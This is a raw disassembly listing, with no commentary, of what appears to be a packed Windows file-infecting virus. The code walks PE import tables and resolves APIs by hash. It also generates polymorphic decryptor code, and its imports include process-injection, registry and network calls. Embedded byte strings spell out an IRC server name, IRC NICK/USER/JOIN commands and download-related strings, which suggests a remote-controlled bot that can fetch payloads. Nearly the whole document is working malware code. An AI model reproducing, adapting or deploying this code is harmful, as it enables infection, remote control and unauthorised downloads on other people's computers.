aGetmodulehandl db 'GetModuleHandleA',0
aGettempfilenam db 'GetTempFileNameA',0
aGettemppatha db 'GetTempPathA',0
aGetversion db 'GetVersion',0
aGetversionexa db 'GetVersionExA',0
aLoadlibrarya db 'LoadLibraryA',0
aMapviewoffile db 'MapViewOfFile',0
aOpenfilemappin db 'OpenFileMappingA',0
aOpenprocess db 'OpenProcess',0
aProcess32first db 'Process32First',0
aProcess32next db 'Process32Next',0
aSetfileattribu db 'SetFileAttributesA',0
aSetfiletime db 'SetFileTime',0
aSleep db 'Sleep',0
aSystemtimetofi db 'SystemTimeToFileTime',0
aUnmapviewoffil db 'UnmapViewOfFile',0
aVirtualalloc db 'VirtualAlloc',0
aWritefile db 'WriteFile',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
aNtcreatefile db 'NtCreateFile',0
aNtcreateproces db 'NtCreateProcess',0
aNtcreateproc_0 db 'NtCreateProcessEx',0
aNtcreatesectio db 'NtCreateSection',0
aNtmapviewofsec db 'NtMapViewOfSection',0
aNtopenfile db 'NtOpenFile',0
aNtopenprocesst db 'NtOpenProcessToken',0
aNtprotectvirtu db 'NtProtectVirtualMemory',0
aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31428C51 proc near ; CODE XREF: UPX2:31428CF8�p
; UPX2:31428D09�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31428C51 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31428D34
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_31428D34
mov ecx, [ebp+401588h]
jecxz short loc_31428CEC
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31428CEC: ; CODE XREF: UPX2:31428CDE�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31428C51
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31428C51
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31428C51
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31428D34
lea ecx, [edi+23F5h]
call sub_31428C51
loc_31428D34: ; CODE XREF: UPX2:31428C9E�j
; UPX2:31428CD6�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401A43h, 958DFF6Ah, 401A0Eh, 20CD5250h
dd 2A0024h, 660CC483h, 1A5485C7h, 20CD0040h, 1A5685C7h
dd 240040h, 0C35D002Ah, 16A016Ah, 73FF33FFh, 8515FF04h
dd 68F074C0h, 0Bh, 35BD08Bh, 0B58D3C50h, 401A72h, 10CBA8Bh
dd 8A8B0000h, 108h, 0CB2BF803h, 0F3CB8B60h, 57461A6h, 0EBF5E247h
dd 0FC783C2h, 53D48B57h, 5450CC8Bh, 5251406Ah, 95FFFF6Ah
dd 4035F0h, 8B0CC483h, 40357495h, 83D72B00h, 7C707EAh
dd 0E8006Ah, 0C3035789h, 0E8581A6Ah, 9, 0AA61428Dh, 0F075C9FEh
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_31428E19 proc near ; CODE XREF: sub_31429684+1B�p
; sub_314297FC+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31428E19 endp
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B09ED81h, 9D8B0040h, 40364Ah, 8247C83h
dd 0B9840F00h, 81000000h, 208ECh, 4685400h, 0FF000001h
dd 40359095h, 8DFC8B00h, 1042484h, 6A500000h, 4E800h, 52560000h
dd 0FF570054h, 40358C95h, 8DC93300h, 10497h, 6A515100h
dd 16A5102h, 68h, 95FF5240h, 40355Ch, 74F68596h, 6854505Bh
dd 104h, 24B4FF57h, 220h, 362895FFh, 85590040h, 0E31674C0h
dd 0D48B5014h, 5152006Ah, 95FF5657h, 4035CCh, 75C08559h
dd 95FF56D0h, 40353Ch, 5244578Dh, 58446A57h, 104978Dh
dd 33AB0000h, 59106AC0h, 5050ABF3h, 50505050h, 95FF5250h
dd 403564h, 208C481h, 74FF0000h, 95FF0824h, 403618h, 1895FF53h
dd 5D004036h, 800004C2h, 1750A3Eh, 848D8B46h, 0E3004015h
dd 958D19h, 3004010h, 0D2FF56D1h, 880FC084h, 11Fh, 110840Fh
dd 3E800000h, 4610753Ah, 0F003E80h, 10184h, 203E8000h
dd 8146F175h, 4E49503Eh, 8B427547h, 146C6CFh, 51CE2B4Fh
dd 5651006Ah, 1095FF53h, 59004036h, 850FC13Bh, 0DFh, 1DA2858Dh
dd 6A0040h, 0C68h, 0FF535000h, 40361095h, 0C3D00h, 850F0000h
dd 0BFh, 0B1E9h, 503E8100h, 0F564952h, 0A585h, 8C68300h
dd 0F0D3CACh, 9984h, 75203C00h, 3A3CACF3h, 8C850Fh, 0DAD0000h
dd 20202020h, 6567213Dh, 0AC7F7574h, 7C75203Ch, 20FF7E81h
dd 75747468h, 37E8171h, 2F2F3A70h, 47C66875h, 310F00FFh
dd 2710BAh, 52E2F700h, 35BC95FFh, 0C0330040h, 50505050h
dd 9E8h, 776F4400h, 616F6C6Eh, 95FF0064h, 403620h, 3674C085h
dd 8589C933h, 40364Ah, 2006851h, 51518000h, 95FF5056h
dd 403624h, 1B03958Dh, 33500040h, 505154C9h, 0FF515152h
dd 40356C95h, 24048700h, 353C95FFh, 0C3F80040h, 15778D80h
dd 0F9010040h, 464F53C3h, 52415754h, 694D5C45h, 736F7263h
dd 5C74666Fh, 646E6957h, 5C73776Fh, 72727543h, 56746E65h
dd 69737265h, 455C6E6Fh, 6F6C7078h, 726572h, 67726154h
dd 6F487465h, 2007473h, 7FF0FF00h, 70010000h, 69786F72h
dd 72692E6Dh, 6C616763h, 2E797861h, 4E006C70h, 204B4349h
dd 63786D70h, 75746A67h, 4553550Ah, 30692052h, 30353032h
dd 202E2031h, 2D3A202Eh, 4E494F4Ah, 69762620h, 0A757472h
dd 0E855h, 815D0000h, 401DB4EDh, 7785C600h, 4015h, 359495FFh
dd 0E8C10040h, 6A3C741Fh, 50B58B1Eh, 59004035h, 752E3CACh
dd 3E81662Ah, 23751DFFh, 3640BD8Dh, 768B0040h, 66A55702h
dd 6A858DA5h, 8F004033h, 40339085h, 4689FA00h, 0FE4E8CFAh
dd 0E201B1FBh, 8D43EBCFh, 4015B185h, 6A5000h, 95FF0E6Ah
dd 4035A4h, 8247C83h, 0E82B7504h, 4, 434653h, 358895FFh
dd 48E80040h, 0E8FFFFFCh, 7, 5F434653h, 0FF00534Fh, 40358895h
dd 0FC31E800h, 56E8FFFFh, 0FFFFFFF3h, 4013038Dh, 0BE800h
dd 53550000h, 32335245h, 4C4C442Eh, 9C95FF00h, 0E8004035h
dd 0Ah, 72707377h, 66746E69h, 0FF500041h, 40354895h, 54858900h
dd 0F004035h, 0E08D8D31h, 89004018h, 40364685h, 95FF5100h
dd 40359Ch, 46893h, 0B58D0000h, 4018EDh, 2CBD8D59h, 0E8004036h
dd 0FFFFF6D6h, 6785C766h, 0FF00401Dh, 69A583F0h, 401Dh
dd 1D27958Dh, 54500040h, 6A016Ah, 26852h, 95FF8000h, 403630h
dd 755AC085h, 5A8D8D22h, 5200401Dh, 0B58D066Ah, 401D67h
dd 50505654h, 95FF5251h, 403634h, 2C95FF58h, 0C6004036h
dd 40384D85h, 0CE80000h, 57000000h, 4B434F53h, 442E3233h
dd 0FF004C4Ch, 40359C95h, 7689300h, 8D000000h, 401844B5h
dd 0BD8D5900h, 4035FCh, 0FFF651E8h, 0CE8FFh, 49570000h
dd 454E494Eh, 4C442E54h, 95FF004Ch, 40359Ch, 840FC085h
dd 1E7h, 56893h, 0B58D0000h, 401882h, 18BD8D59h, 0E8004036h
dd 0FFFFF61Ah, 361CBD83h, 0F000040h, 1C284h, 90EC8100h
dd 54000001h, 10168h, 0FC95FF00h, 81004035h, 190C4h, 0D48B5000h
dd 0FF52006Ah, 40361C95h, 59C08500h, 88680D75h, 0FF000013h
dd 4035BC95h, 83E2EB00h, 401D69BDh, 29750000h, 1D6D858Dh
dd 0FF500040h, 40360895h, 0FC08500h, 13B84h, 0C408B00h
dd 30FF008Bh, 1D69858Fh, 85C60040h, 40384Dh, 6A006A01h
dd 0FF026A01h, 40361495h, 0FFF88300h, 112840Fh, 8D930000h
dd 401D6595h, 52106A00h, 495FF53h, 85004036h, 0F2850FC0h
dd 8D000000h, 401D86BDh, 0E808B100h, 0FFFFFABCh, 9468h
dd 0E62B5E00h, 54243489h, 359895FFh, 0BD8D0040h, 401D94h
dd 9DE801B1h, 8BFFFFFAh, 0C1102444h, 440B08E0h, 0E0C10424h
dd 24440B08h, 5E85008h, 25000000h, 78362Eh, 5495FF57h
dd 83004035h, 47C60CC4h, 958D2006h, 401D81h, 2168006Ah
dd 52000000h, 1095FF53h, 8D004036h, 5714247Ch, 355895FFh
dd 4C60040h, 6A400A38h, 53575000h, 361095FFh, 0E6030040h
dd 1DA2BD8Dh, 6A0040h, 0C68h, 0FF535700h, 40361095h, 0C3D00h
dd 4D750000h, 364EB58Dh, 8D8D0040h, 40384Dh, 6ACE2Bh, 0FF535651h
dd 40360C95h, 0F88300h, 8B912F7Eh, 4EB58DFEh, 0B0004036h
dd 75AEF20Dh, 0F8E86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 4EBD8DCEh, 0F3004036h, 0EBF787A4h, 95FF53B9h
dd 403600h, 1577BD80h, 74010040h, 7530682Ah, 95FF0000h
dd 4035BCh, 384DBD80h, 74000040h, 6985C711h, 401Dh, 0C6000000h
dd 40384D85h, 56E90000h, 0C7FFFFFEh, 40158085h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 84040A0Dh
dd 8B9930C7h, 79EDDB85h, 52484FD4h, 14294037h, 0F96A10A6h
dd 0C17E606Eh, 0AD471A73h, 0FAE56299h, 0F2F027B1h, 5957EBDFh
dd 14133AABh, 0CC5C10A6h, 0DA8FC26Ch, 40AC150Eh, 0B3522787h
dd 0D8B8h, 0Fh dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_314295CE proc near ; CODE XREF: sub_31429615:loc_31429672�p
; sub_314296D5+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_314295EA: ; CODE XREF: sub_314295CE+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3142960C
cmp eax, [edx+8]
jnb short loc_3142960C
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_31429611
; ---------------------------------------------------------------------------
loc_3142960C: ; CODE XREF: sub_314295CE+23�j
; sub_314295CE+28�j
add edx, 28h
loop loc_314295EA
loc_31429611: ; CODE XREF: sub_314295CE+3C�j
popa
retn 4
sub_314295CE endp
; =============== S U B R O U T I N E =======================================
sub_31429615 proc near ; CODE XREF: UPX2:31429941�p
; UPX2:31429967�p
mov [ebp+4022F7h], al
call sub_31429684
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_3142962C: ; CODE XREF: sub_31429615+1E�j
cmp [eax], ebx
jz short loc_3142963C
add eax, 4
loop loc_3142962C
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_3142963C: ; CODE XREF: sub_31429615+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_31429656
loc_31429646: ; CODE XREF: sub_31429615+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_31429646
mov [ebp+402224h], ebx
loc_31429656: ; CODE XREF: sub_31429615+2F�j
; sub_31429684+34�j
cmp dword ptr [edx], 0
jz short loc_31429660
sub esi, [edx]
add esi, [edx+10h]
loc_31429660: ; CODE XREF: sub_31429615+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3142966F
push dword ptr [edx]
jmp short loc_31429672
; ---------------------------------------------------------------------------
loc_3142966F: ; CODE XREF: sub_31429615+54�j
push dword ptr [edx+10h]
loc_31429672: ; CODE XREF: sub_31429615+58�j
call sub_314295CE
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_31429615 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429684 proc near ; CODE XREF: sub_31429615+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_314296D5
mov eax, [ebp+40398Eh]
call sub_31428E19
call sub_314296C1
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_314296BA
mov [ebp+4022A0h], ebx
jmp short loc_31429656
; ---------------------------------------------------------------------------
loc_314296BA: ; CODE XREF: sub_31429684+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_31429684 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314296C1 proc near ; CODE XREF: sub_31429684+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_314296D5
xor ecx, ecx
retn
sub_314296C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_314296D5 proc near ; CODE XREF: sub_31429684+10�p
; sub_314296C1+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_314295CE
add edx, [ebp+4039AAh]
add edx, esi
loc_314296E9: ; CODE XREF: sub_314296D5+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_314297FA
cmp dword ptr [edx+10h], 0
jz locret_314297FA
mov eax, [edx+0Ch]
push eax
call sub_314295CE
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_3142970F: ; CODE XREF: sub_314296D5+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3142972F
cmp cl, 2Eh
jz short loc_3142971E
loc_3142971B: ; CODE XREF: sub_314296D5+58�j
inc eax
jmp short loc_3142970F
; ---------------------------------------------------------------------------
loc_3142971E: ; CODE XREF: sub_314296D5+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3142971B
loc_3142972F: ; CODE XREF: sub_314296D5+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_314297F2
cmp word ptr [eax-2], 3233h
jnz loc_314297F2
push esi
cmp dword ptr [edx], 0
jnz short loc_31429752
mov ecx, [edx+10h]
jmp short loc_31429754
; ---------------------------------------------------------------------------
loc_31429752: ; CODE XREF: sub_314296D5+76�j
mov ecx, [edx]
loc_31429754: ; CODE XREF: sub_314296D5+7B�j
add esi, ecx
push ecx
call sub_314295CE
add esi, [ebp+4039AAh]
loc_31429762: ; CODE XREF: sub_314296D5+90�j
; sub_314296D5+117�j
lodsd
test eax, eax
js short loc_31429762
jz loc_314297F1
push dword ptr [ebp+4039AAh]
push eax
call sub_314295CE
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3142978E: ; CODE XREF: sub_314296D5+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_314297A5
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3142978E
; ---------------------------------------------------------------------------
loc_314297A5: ; CODE XREF: sub_314296D5+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_314297EB
cmp ebx, 0DB6E45A8h
jz short loc_314297EB
cmp ebx, 0FFA13B59h
jz short loc_314297EB
cmp ebx, 0ACB522D6h
jz short loc_314297EB
cmp ebx, 0F358E993h
jz short loc_314297EB
cmp ebx, 0F358E97Dh
jz short loc_314297EB
cmp ebx, 0E1253F46h
jz short loc_314297EB
cmp ebx, 0E1253F30h
jz short loc_314297EB
call dword ptr [ebp+403992h]
loc_314297EB: ; CODE XREF: sub_314296D5+D6�j
; sub_314296D5+DE�j ...
pop ebx
jmp loc_31429762
; ---------------------------------------------------------------------------
loc_314297F1: ; CODE XREF: sub_314296D5+92�j
pop esi
loc_314297F2: ; CODE XREF: sub_314296D5+60�j
; sub_314296D5+6C�j
add edx, 14h
jmp loc_314296E9
; ---------------------------------------------------------------------------
locret_314297FA: ; CODE XREF: sub_314296D5+18�j
; sub_314296D5+22�j
retn
sub_314296D5 endp
; ---------------------------------------------------------------------------
db 2
; =============== S U B R O U T I N E =======================================
sub_314297FC proc near ; CODE XREF: UPX2:3142993A�p
; UPX2:31429960�p
push 4
pop eax
call sub_31428E19
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31428E19
add edx, 8
xchg edx, ecx
loc_31429824: ; CODE XREF: sub_314297FC:loc_31429863�j
push 5
pop eax
call sub_31428E19
cmp dl, 3
jnb short loc_3142983C
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_31429863
; ---------------------------------------------------------------------------
loc_3142983C: ; CODE XREF: sub_314297FC+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_3142985D
mov al, 11h
call sub_31428E19
mov eax, 1
loc_31429851: ; CODE XREF: sub_314297FC+5D�j
test dl, dl
jz short loc_31429862
shl eax, 1
dec dl
jmp short loc_31429851
; ---------------------------------------------------------------------------
jmp short loc_31429862
; ---------------------------------------------------------------------------
loc_3142985D: ; CODE XREF: sub_314297FC+47�j
mov eax, 80000000h
loc_31429862: ; CODE XREF: sub_314297FC+57�j
; sub_314297FC+5F�j
stosd
loc_31429863: ; CODE XREF: sub_314297FC+3E�j
loop loc_31429824
retn
sub_314297FC endp
; ---------------------------------------------------------------------------
loc_31429866: ; CODE XREF: sub_3142A2C0+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142987B
mov al, 60h
stosb
loc_3142987B: ; CODE XREF: UPX2:31429876�j
test dword ptr [ebp+403431h], 1000003h
jz loc_31429981
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EECC443Fh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_314298F9
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_314298C4
mov eax, 2E8B6467h
loc_314298C4: ; CODE XREF: UPX2:314298BD�j
stosd
mov ax, 0
stosw
jz short loc_314298D0
mov al, 5Dh
stosb
loc_314298D0: ; CODE XREF: UPX2:314298CB�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_314298F7
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_314298F7
mov eax, 0F8ED83h
loc_314298F7: ; CODE XREF: UPX2:314298DF�j
; UPX2:314298F0�j
stosd
dec edi
loc_314298F9: ; CODE XREF: UPX2:314298AC�j
test dword ptr [ebp+403431h], 3
jz short loc_31429909
mov al, 0E9h
stosb
stosd
loc_31429909: ; CODE XREF: UPX2:31429903�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_31429981
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_314297FC
mov al, 20h
call sub_31429615
jecxz short loc_31429981
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_31429974
call sub_314297FC
mov al, 1Fh
call sub_31429615
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_31429974: ; CODE XREF: UPX2:3142995E�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_31429981: ; CODE XREF: UPX2:31429885�j
; UPX2:31429920�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3142999F
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3142999F: ; CODE XREF: UPX2:3142998B�j
test dword ptr [ebp+403431h], 8
jnz short loc_314299F5
cmp byte ptr [ebp+40342Fh], 0
jz short loc_314299F5
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_314299F3
mov al, 49h
stosb
mov ax, 0FC75h
loc_314299F3: ; CODE XREF: UPX2:314299EA�j
stosw
loc_314299F5: ; CODE XREF: UPX2:314299A9�j
; UPX2:314299B2�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_31429A16
mov al, 58h
or al, [ebp+403429h]
stosb
loc_31429A16: ; CODE XREF: UPX2:31429A0B�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_31429A29
add ah, 28h
loc_31429A29: ; CODE XREF: UPX2:31429A24�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_31429A4D
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31429A4D: ; CODE XREF: UPX2:31429A42�j
test dword ptr [ebp+403431h], 80h
jnz short loc_31429A64
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_31429AA1
; ---------------------------------------------------------------------------
loc_31429A64: ; CODE XREF: UPX2:31429A57�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_31429A76
mov al, 29h
loc_31429A76: ; CODE XREF: UPX2:31429A72�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_31429A99
mov ah, 0C8h
loc_31429A99: ; CODE XREF: UPX2:31429A95�j
or ah, [ebp+40342Ah]
stosw
loc_31429AA1: ; CODE XREF: UPX2:31429A62�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_31429B25
test dword ptr [ebp+403431h], 400h
jnz short loc_31429AD0
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_31429B1D
; ---------------------------------------------------------------------------
loc_31429AD0: ; CODE XREF: UPX2:31429AC3�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31429AED
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_31429B02
; ---------------------------------------------------------------------------
loc_31429AED: ; CODE XREF: UPX2:31429ADA�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_31429B02: ; CODE XREF: UPX2:31429AEB�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_31429B15
add ah, 8
loc_31429B15: ; CODE XREF: UPX2:31429B10�j
or ah, [ebp+40342Bh]
stosw
loc_31429B1D: ; CODE XREF: UPX2:31429ACE�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_31429B25: ; CODE XREF: UPX2:31429AB7�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_31429B3A
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31429B3A: ; CODE XREF: UPX2:31429B2F�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_31429B4A
add al, 4
loc_31429B4A: ; CODE XREF: UPX2:31429B46�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_31429B67
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429B67: ; CODE XREF: UPX2:31429B5E�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31429B79
mov ah, 29h
loc_31429B79: ; CODE XREF: UPX2:31429B75�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31429B97
mov al, 86h
loc_31429B97: ; CODE XREF: UPX2:31429B93�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31429BAB
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429BAB: ; CODE XREF: UPX2:31429BA2�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_31429BC2
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_31429BD1
; ---------------------------------------------------------------------------
loc_31429BC2: ; CODE XREF: UPX2:31429BB5�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_31429BD1: ; CODE XREF: UPX2:31429BC0�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31429C0C
test dword ptr [ebp+403431h], 40000h
jnz short loc_31429C03
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31429C0B
; ---------------------------------------------------------------------------
loc_31429C03: ; CODE XREF: UPX2:31429BE7�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31429C0B: ; CODE XREF: UPX2:31429C01�j
stosb
loc_31429C0C: ; CODE XREF: UPX2:31429BDB�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_31429C28
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_31429C30
; ---------------------------------------------------------------------------
loc_31429C28: ; CODE XREF: UPX2:31429C16�j
mov al, 48h
or al, [ebp+40342Ah]
loc_31429C30: ; CODE XREF: UPX2:31429C26�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_31429C64
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_31429C7F
mov cl, 77h
jmp short loc_31429C7F
; ---------------------------------------------------------------------------
loc_31429C64: ; CODE XREF: UPX2:31429C3D�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_31429C7F: ; CODE XREF: UPX2:31429C5E�j
; UPX2:31429C62�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_31429D29
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_31429CC0
mov eax, 2E876467h
loc_31429CC0: ; CODE XREF: UPX2:31429CB9�j
stosd
mov eax, 0
stosw
jnz short loc_31429CD0
mov ax, 0E58Bh
stosw
loc_31429CD0: ; CODE XREF: UPX2:31429CC8�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_31429D26
